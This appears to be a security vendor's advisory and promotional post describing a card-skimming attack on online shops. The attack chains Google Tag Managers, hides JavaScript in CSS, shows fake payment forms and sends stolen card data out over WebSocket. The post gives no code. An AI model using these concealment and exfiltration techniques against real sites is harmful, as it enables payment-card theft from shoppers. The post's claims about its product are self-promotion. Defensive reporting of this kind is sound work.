NEXT LEVEL ATTACK: SEVERAL GTMS WORKING IN SYNC, CSS AND DOM EXPLOITED
May 6, 2025
A sophisticated attack leveraging coordinated Google Tag Managers, CSS obfuscation, and DOM-based execution to deploy counterfeit payment forms and exfiltrate data via WebSocket
The Source Defense Research Intelligence team has uncovered a sophisticated cyberattack targeting e-commerce websites globally. While prior reports have noted the growing trend of nested Google Tag Managers (GTMs) injecting malicious scripts, this is the first documented case of multiple GTMs working in tandem—one dedicated to loading the payload and another executing it.
Furthermore, this attack leverages CSS to conceal the malicious script, embedding it within what appear to be legitimate styling assets—making detection particularly difficult. The script is then executed via the Document Object Model (DOM), a commonly overlooked vector for script activation. This enables attackers to present users with highly convincing counterfeit payment forms. The fake interface closely mimics legitimate ones, deceiving users into entering sensitive credentials. Once captured, the data is exfiltrated through WebSocket channels, bypassing conventional security tools that monitor standard POST requests.
The attack further employs CSS payloads to camouflage malicious scripts, making detection challenging. Execution is carried out unexpectedly via the Document Object Model (DOM), further disguising the attack as generally unmonitored, presenting users with counterfeit payment forms. Notably, a “double form” deception is utilized, where a fake payment form mimics legitimate ones, tricking users into submitting sensitive information. Stolen data is then exfiltrated through WebSocket connections, bypassing traditional monitoring tools that track standard POST requests.
This multi-layered approach reflects a new level of technical finesse in client-side threats and reinforces the urgent need for proactive security solutions beyond conventional controls.
Keep in mind that protecting your checkout pages isn’t enough. This attack can be launched from seemingly innocuous pages, dynamically injecting a fully forged payment interface.
Attack details
A step-by-step description of the attack can be found in the newly posted blog: New Breed of Magecart: GTMs Working Together, JavaScript Hidden in CSS.
The image below highlights the multiple GTMs, the CSS hiding the malicious code and its execution.
How does Source Defense protect you from such attacks?
Despite the multiple methods of disguise, rest assured that even this elusive attack will be detected and blocked by Source Defense. This is made possible through our ongoing active intelligence research, which ensures that the latest malicious domains are promptly identified, blacklisted, and blocked by our system—for customers using the Protect product. In addition, our advanced technology provides rich attack details and triggers alerts, regardless of which Source Defense product is in use.
How will you be alerted?
If a malicious script attempts to load on a site protected by Source Defense—even through multiple layers of GTMs, and even when executed by the DOM —you’ll receive immediate alerts:
- New script identified – flags unknown or suspicious scripts
- New behaviors identified:
- Accessing PCI data
- Accessing PII data
- Loading script from blacklisted domain
- Sending data to blacklisted domain
These alerts would be prominently displayed in:
- The bell notification center
- The dashboard summary (marked in red)
- The ‘Found in blacklists’ and ‘Script behaviors’ widgets with suspicious activity, both highlighted in red
It’s important to note that these flagged domains may not yet be recognized by external blacklist providers—but they are proactively identified and classified as blacklisted within our system.
PCI DSS 4.0 makes client-side security a priority.
Source Defense delivers a solution for 6.4.3 and 11.6.1 without adding a burden to your security teams.